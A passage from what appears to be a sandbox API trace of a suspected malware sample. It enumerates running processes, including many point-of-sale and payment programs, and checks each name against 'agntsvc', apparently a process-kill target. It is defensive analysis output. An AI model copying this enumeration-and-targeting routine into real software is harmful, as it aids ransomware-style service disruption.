lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0093.434] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0093.434] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="agntsvc") returned 0x0 [0093.434] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0093.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.436] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3566e10 [0093.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3566e10, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0093.436] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0093.436] StrStrIA (lpFirst="active-charge.exe", lpSrch="agntsvc") returned 0x0 [0093.436] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0093.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.437] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568ee0 [0093.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3568ee0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0093.437] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0093.437] StrStrIA (lpFirst="accupos.exe", lpSrch="agntsvc") returned 0x0 [0093.438] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0093.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.439] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568f10 [0093.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3568f10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0093.439] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0093.439] StrStrIA (lpFirst="afr38.exe", lpSrch="agntsvc") returned 0x0 [0093.439] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0093.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.446] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568e08 [0093.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3568e08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0093.446] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0093.446] StrStrIA (lpFirst="aldelo.exe", lpSrch="agntsvc") returned 0x0 [0093.446] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0093.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.447] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3568f70 [0093.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3568f70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0093.447] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0093.447] StrStrIA (lpFirst="ccv_server.exe", lpSrch="agntsvc") returned 0x0 [0093.447] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0093.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0093.449] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3566f30 [0093.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3566f30, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0093.449] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0093.449] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="agntsvc") returned 0x0 [0093.449] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0093.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.450] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3566d30 [0093.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3566d30, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0093.450] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0093.450] StrStrIA (lpFirst="creditservice.exe", lpSrch="agntsvc") returned 0x0 [0093.450] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0093.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.451] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568f40 [0093.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3568f40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0093.452] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0093.452] StrStrIA (lpFirst="edcsvr.exe", lpSrch="agntsvc") returned 0x0 [0093.452] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0093.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.453] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568e20 [0093.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3568e20, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0093.453] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0093.453] StrStrIA (lpFirst="fpos.exe", lpSrch="agntsvc") returned 0x0 [0093.454] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0093.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.455] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568e38 [0093.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3568e38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0093.455] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0093.455] StrStrIA (lpFirst="isspos.exe", lpSrch="agntsvc") returned 0x0 [0093.455] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0093.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.456] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3566d90 [0093.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3566d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0093.456] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0093.456] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="agntsvc") returned 0x0 [0093.456] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0093.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.457] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569000 [0093.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3569000, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0093.457] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0093.457] StrStrIA (lpFirst="omnipos.exe", lpSrch="agntsvc") returned 0x0 [0093.457] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0093.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.459] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568d48 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3568d48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0093.459] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0093.459] StrStrIA (lpFirst="spcwin.exe", lpSrch="agntsvc") returned 0x0 [0093.459] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0093.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.460] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3566fb0 [0093.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3566fb0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0093.460] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0093.460] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="agntsvc") returned 0x0 [0093.460] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0093.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.461] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568e50 [0093.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3568e50, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0093.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0093.461] StrStrIA (lpFirst="utg2.exe", lpSrch="agntsvc") returned 0x0 [0093.461] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0093.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.462] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568d60 [0093.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3568d60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0093.462] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0093.462] StrStrIA (lpFirst="saying.exe", lpSrch="agntsvc") returned 0x0 [0093.462] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0093.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.464] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568e68 [0093.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3568e68, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0093.464] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0093.464] StrStrIA (lpFirst="ripe.exe", lpSrch="agntsvc") returned 0x0 [0093.464] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0093.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.465] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568eb0 [0093.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3568eb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0093.465] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0093.465] StrStrIA (lpFirst="acoustic.exe", lpSrch="agntsvc") returned 0x0 [0093.465] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0093.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.466] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568d78 [0093.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3568d78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0093.466] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0093.466] StrStrIA (lpFirst="mail.exe", lpSrch="agntsvc") returned 0x0 [0093.466] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0093.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.467] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568d90 [0093.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3568d90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0093.467] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0093.467] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="agntsvc") returned 0x0 [0093.467] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.468] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568e80 [0093.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3568e80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.468] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.468] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.468] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.469] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568f58 [0093.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568f58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.470] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0093.470] StrStrIA (lpFirst="dllhost.exe", lpSrch="agntsvc") returned 0x0 [0093.470] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.471] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568ec8 [0093.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3568ec8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 